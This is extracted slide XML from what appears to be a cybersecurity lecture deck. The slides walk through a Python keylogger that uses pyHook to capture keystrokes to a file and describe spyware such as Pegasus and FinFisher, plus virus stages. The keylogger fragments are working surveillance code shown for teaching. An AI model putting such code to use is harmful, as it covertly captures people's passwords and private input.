              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> chr(event.Ascii)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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> event.Ascii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> 13: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keylogs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> '/n'</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buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>+=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> keylogs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f.write(buffer)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f.close() </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create a hook manager object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hm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> pyHook.HookManager()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hm.KeyDown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> OnKeyboardEvent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set the hook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hm.HookKeyboard()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 wait forever </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pythoncom.PumpMessages() </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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5570531" y="2307557"/>
            <a:ext cx="2738092" cy="828273"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738092" h="828273" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738092" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738092" y="828273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="828273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667232" y="6333301"/>
            <a:ext cx="2793214" cy="844947"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2793214" h="844947" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2793214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793214" y="844947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="844947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526730" y="1750144"/>
            <a:ext cx="9385732" cy="185737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90" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Now, it opens the same file in write mode ('w'). It converts the ASCII code of the pressed key to a character using chr(event.Ascii), and if the ASCII code is 13 (Enter key), it replaces the key with a newline character. The buffer containing the existing keystrokes is then updated with the new key, and the entire content is written back to the file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8308623" y="6063823"/>
            <a:ext cx="9782607" cy="222885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2490" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Finally, it creates a pyHook.HookManager object, assigns the OnKeyboardEvent function to be called when a key is pressed (KeyDown event), sets the hook to monitor keyboard events, and enters a loop with pythoncom.PumpMessages() to wait for and process messages. This loop essentially keeps the script running indefinitely, continuously monitoring and logging keyboard events.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;p2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364" name="Google Shape;364;p3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365" name="Google Shape;365;p3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66" name="Google Shape;366;p3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367" name="Google Shape;367;p3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68" name="Google Shape;368;p3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69" name="Google Shape;369;p3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70" name="Google Shape;370;p3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71" name="Google Shape;371;p3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SPYWARE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630287" y="1282127"/>
            <a:ext cx="16773425"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Spyware is malicious software designed to secretly collect information about a user's activities and transmit it to a third party without the user's consent. This information can include keystrokes, login credentials, browsing habits, personal files, and more. Spyware is often used for various malicious purposes, including identity theft, financial fraud, and unauthorized surveillance.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Examples:-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Pegasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>- It has been used in targeted attacks against journalists, human rights activists, and government officials.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FinFisher-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> It is a surveillance tool developed by the UK-based company Gamma Group. It is designed to target various platforms, including Windows, macOS, Android, and iOS.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Zeus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>- It is a notorious banking Trojan that has been used to steal financial information, including banking credentials and personal data. It is often distributed through phishing emails and malicious websites.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p3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379" name="Google Shape;379;p3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380" name="Google Shape;380;p3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81" name="Google Shape;381;p3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382" name="Google Shape;382;p3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83" name="Google Shape;383;p3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84" name="Google Shape;384;p3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385" name="Google Shape;385;p3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386" name="Google Shape;386;p3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PEGASUS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630287" y="1282126"/>
            <a:ext cx="16773425"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Pegasus is a notorious spyware developed by the Israeli cyberarms firm NSO Group. It gained significant attention due to its advanced capabilities and its use in targeting high-profile individuals, activists, journalists, and government officials.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Pegasus is designed to infect mobile devices, specifically smartphones. Once installed on a device, it can silently gather a wide range of information, including:</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Call Logs and Contacts: Pegasus can access call logs, contact information, and details about communications.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Messages and Emails: It can read text messages, emails, and other communications.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Camera and Microphone Access: Pegasus can secretly activate the device's camera and microphone to record audio and video.</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Location Tracking: The spyware can track the device's location in real-time.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388" name="Google Shape;388;p3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7" name="Google Shape;107;p1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8" name="Google Shape;108;p1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9" name="Google Shape;109;p1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10" name="Google Shape;110;p1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11" name="Google Shape;111;p1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12" name="Google Shape;112;p1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13" name="Google Shape;113;p1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14" name="Google Shape;114;p1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ATTACKS &amp; TECHNIQUES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639302" y="2739580"/>
            <a:ext cx="8089165" cy="34171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In cybersecurity, attacks refer to malicious activities or actions taken with the intent to compromise the confidentiality, integrity, or availability of computer systems, networks, or data. Attackers use various techniques to exploit vulnerabilities and gain unauthorized access or control over digital assets.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p1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
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10609118" y="2371725"/>
            <a:ext cx="6650182" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6650182" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6650182" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6650182" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:no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394" name="Google Shape;394;p3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395" name="Google Shape;395;p3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396" name="Google Shape;396;p3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397" name="Google Shape;397;p3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398" name="Google Shape;398;p3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399" name="Google Shape;399;p3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00" name="Google Shape;400;p3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01" name="Google Shape;401;p3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PEGASUS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630287" y="1282126"/>
            <a:ext cx="16773425" cy="39029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Keystroke Logging: Pegasus can record keystrokes, capturing usernames, passwords, and other sensitive information.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Remote Exploits: It can exploit vulnerabilities to gain control over the device remotely.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Pegasus has been used in targeted attacks against individuals, often deployed through phishing messages or malicious links. Its sophistication makes it difficult to detect, and its ability to remain hidden makes it a powerful tool for cyber espionage.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Google Shape;403;p3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409" name="Google Shape;409;p3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410" name="Google Shape;410;p3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11" name="Google Shape;411;p3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412" name="Google Shape;412;p3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13" name="Google Shape;413;p3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14" name="Google Shape;414;p3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15" name="Google Shape;415;p3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16" name="Google Shape;416;p3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VIRUS &amp; WORMS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Google Shape;417;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750119" y="2312543"/>
            <a:ext cx="16787763" cy="29314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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> A computer virus is a type of malicious software that attaches itself to a legitimate program or file, spreading from one computer to another when the infected file is shared.</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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> ILOVEYOU Virus (Love Bug): Released in 2000, this virus spread via email and affected millions of computers globally. It was disguised as a love letter and, when opened, infected the user's system, causing widespread damage.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p3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424" name="Google Shape;424;p3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425" name="Google Shape;425;p3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26" name="Google Shape;426;p3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427" name="Google Shape;427;p3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28" name="Google Shape;428;p3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29" name="Google Shape;429;p3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30" name="Google Shape;430;p3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31" name="Google Shape;431;p3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Virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216000" y="1131544"/>
            <a:ext cx="17595663" cy="7446141"/>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2800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Replication:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Viruses have the ability to replicate themselves. They attach their malicious code to legitimate programs or files, and when the infected program is executed, the virus activates and reproduces.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="28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2800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Infection Mechanism:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Viruses typically attach themselves to executable files, scripts, or documents. They can spread through email attachments, infected websites, removable storage devices, or network connections.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="28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2800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Payload:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The payload is the malicious code or action that the virus performs. It can range from displaying messages or images to destroying or corrupting data. Some viruses are designed to remain dormant until triggered by a specific event or condition.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="28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2800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Concealment:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Viruses often attempt to conceal their presence to avoid detection. This can involve encrypting or obfuscating their code, as well as employing anti-debugging or anti-analysis techniques.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212121"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6046016"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439" name="Google Shape;439;p3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440" name="Google Shape;440;p3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41" name="Google Shape;441;p3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442" name="Google Shape;442;p3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43" name="Google Shape;443;p3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44" name="Google Shape;444;p3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45" name="Google Shape;445;p3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46" name="Google Shape;446;p3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Virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663" cy="14740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Self-Modification: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Some viruses have self-modifying capabilities, making it challenging for antivirus software to detect them using static signatures. They may alter their code or structure to evade detection.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448;p3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454" name="Google Shape;454;p3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455" name="Google Shape;455;p3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56" name="Google Shape;456;p3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457" name="Google Shape;457;p3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58" name="Google Shape;458;p3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59" name="Google Shape;459;p3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60" name="Google Shape;460;p3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61" name="Google Shape;461;p3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Stages of Virus Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="1759566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Injection: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virus injects its code into a host file or program, integrating itself with the legitimate code.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Replication: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virus replicates its code and spreads to other files, programs, or systems. This can happen through various means, including sharing infected files or exploiting vulnerabilities.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Activation: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virus becomes active when the infected program or file is executed. At this stage, the payload is executed, and the virus may carry out its malicious actions.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Propagation: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virus continues to spread to other systems, devices, or networks, perpetuating the infection cycle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
